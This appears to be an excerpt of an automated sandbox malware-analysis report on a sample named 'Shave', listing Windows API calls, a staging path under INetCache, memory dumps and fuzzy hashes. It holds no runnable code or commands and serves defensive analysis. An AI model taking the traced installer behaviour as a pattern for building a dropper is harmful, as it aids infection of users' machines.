                                                                                                                                  • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
                                                                                                                                  • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                                                                                  • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                  • Part of subcall function 004057CE: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,00000000,000000F0), ref: 0040164D
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne, xrefs: 00401640
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne
                                                                                                                                • API String ID: 1892508949-613682384
                                                                                                                                • Opcode ID: 54df887ae09462074095b126549abc23ab63c7b2394cf9b5eb7ef3472ce62764
                                                                                                                                • Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
                                                                                                                                • Opcode Fuzzy Hash: 54df887ae09462074095b126549abc23ab63c7b2394cf9b5eb7ef3472ce62764
                                                                                                                                • Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E
                                                                                                                                APIs
                                                                                                                                • IsWindowVisible.USER32(?), ref: 004052A2
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                                                                                                                  • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                                                                • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                                                                                                                • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                                                                • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 941ee5e4d2dd291ec8cc4df06cb0aa63c1aa92b31a4513dbbbd606f9940ae0f3
                                                                                                                                • Instruction ID: 96c9f76e6636b9c2d25b0b1467c2954fc3cee1ad24e3c7ba74a0f8c29babf82b
                                                                                                                                • Opcode Fuzzy Hash: 941ee5e4d2dd291ec8cc4df06cb0aa63c1aa92b31a4513dbbbd606f9940ae0f3
                                                                                                                                • Instruction Fuzzy Hash: 9531C731D00205EACF21AFA1DE4899E7A71BF44354F24813BF115B61E1CBB98952DB69
                                                                                                                                APIs
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401BE7
                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                • String ID: Call
                                                                                                                                • API String ID: 3394109436-1824292864
                                                                                                                                • Opcode ID: 913a1641bf1678fd544d2f354cdad38cfe4f2c05cfad93494d599300ab092abb
                                                                                                                                • Instruction ID: ae3691a386166457dd68fa0d34360560a99e353b90efe6619b1f582ab4c46bbf
                                                                                                                                • Opcode Fuzzy Hash: 913a1641bf1678fd544d2f354cdad38cfe4f2c05cfad93494d599300ab092abb
                                                                                                                                • Instruction Fuzzy Hash: 9B219973600100DBDB20EF94DD8595E77A4AB44318735053FF102F32D0DBB8A8909BAD
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$FreeHandleLoadModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2140536961-0
                                                                                                                                • Opcode ID: 8fcabb61ffb99872d1cb9b65f1cb7f04ab46d08011be29023730949652e91217
                                                                                                                                • Instruction ID: 4ef3947a4f3b15eeb1edbcf2825d86a3d57027b1e8ef6f61f5e5c173a0dbc30c
                                                                                                                                • Opcode Fuzzy Hash: 8fcabb61ffb99872d1cb9b65f1cb7f04ab46d08011be29023730949652e91217
                                                                                                                                • Instruction Fuzzy Hash: 54114271D00205ABCF20AFA5CA8859E7A71BF04345F64853BF501F61E0DBB98D91DB69
                                                                                                                                APIs
                                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Enum$CloseValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 397863658-0
                                                                                                                                • Opcode ID: 56344988bb6116f92104e687caff177940e4dcbfe6d483e74d802acf9f516b16
                                                                                                                                • Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
                                                                                                                                • Opcode Fuzzy Hash: 56344988bb6116f92104e687caff177940e4dcbfe6d483e74d802acf9f516b16
                                                                                                                                • Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2386745512.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2386728456.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386788272.000000006F973000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386807263.000000006F975000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_6f970000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorFileLastRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1948546556-0
                                                                                                                                • Opcode ID: 9a085b68ac04b277299a0b89f66bc10333a2ad59e22b0a31af2c1b96164b3ffb
                                                                                                                                • Instruction ID: 70105b0a501421a3f4f25a6cc40d13841439ee982f43bbd643a2481311f9f4ca
                                                                                                                                • Opcode Fuzzy Hash: 9a085b68ac04b277299a0b89f66bc10333a2ad59e22b0a31af2c1b96164b3ffb
                                                                                                                                • Instruction Fuzzy Hash: C9517E72928754DFEB78DFA8D940B5977A9FB56328F20442AD404CA2C2DF34E491CF91
                                                                                                                                APIs
                                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                • Opcode ID: 2817fdc1b453530556b1233eeb78b93eab19bad1ba8c502dca76499b0c80bb5e
                                                                                                                                • Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
                                                                                                                                • Opcode Fuzzy Hash: 2817fdc1b453530556b1233eeb78b93eab19bad1ba8c502dca76499b0c80bb5e
                                                                                                                                • Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A
                                                                                                                                APIs
                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                                                • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                                                                                                • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                                                • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                                                                                                APIs
                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                • Opcode ID: a5279d58909cb0200b7873d2906f67189e0a8c6f713d0d692494d0366452260b
                                                                                                                                • Instruction ID: ed958cdb0af940290ad8e224458c39a91d35accb7d2f19645d781aa9a2f92111
                                                                                                                                • Opcode Fuzzy Hash: a5279d58909cb0200b7873d2906f67189e0a8c6f713d0d692494d0366452260b
                                                                                                                                • Instruction Fuzzy Hash: ECE01A72E082008FE764ABA5AA495AD77B4EB91325B20847FE211F11D1DE7858418F6A
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                                                                  • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                                                                  • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
                                                                                                                                  • Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
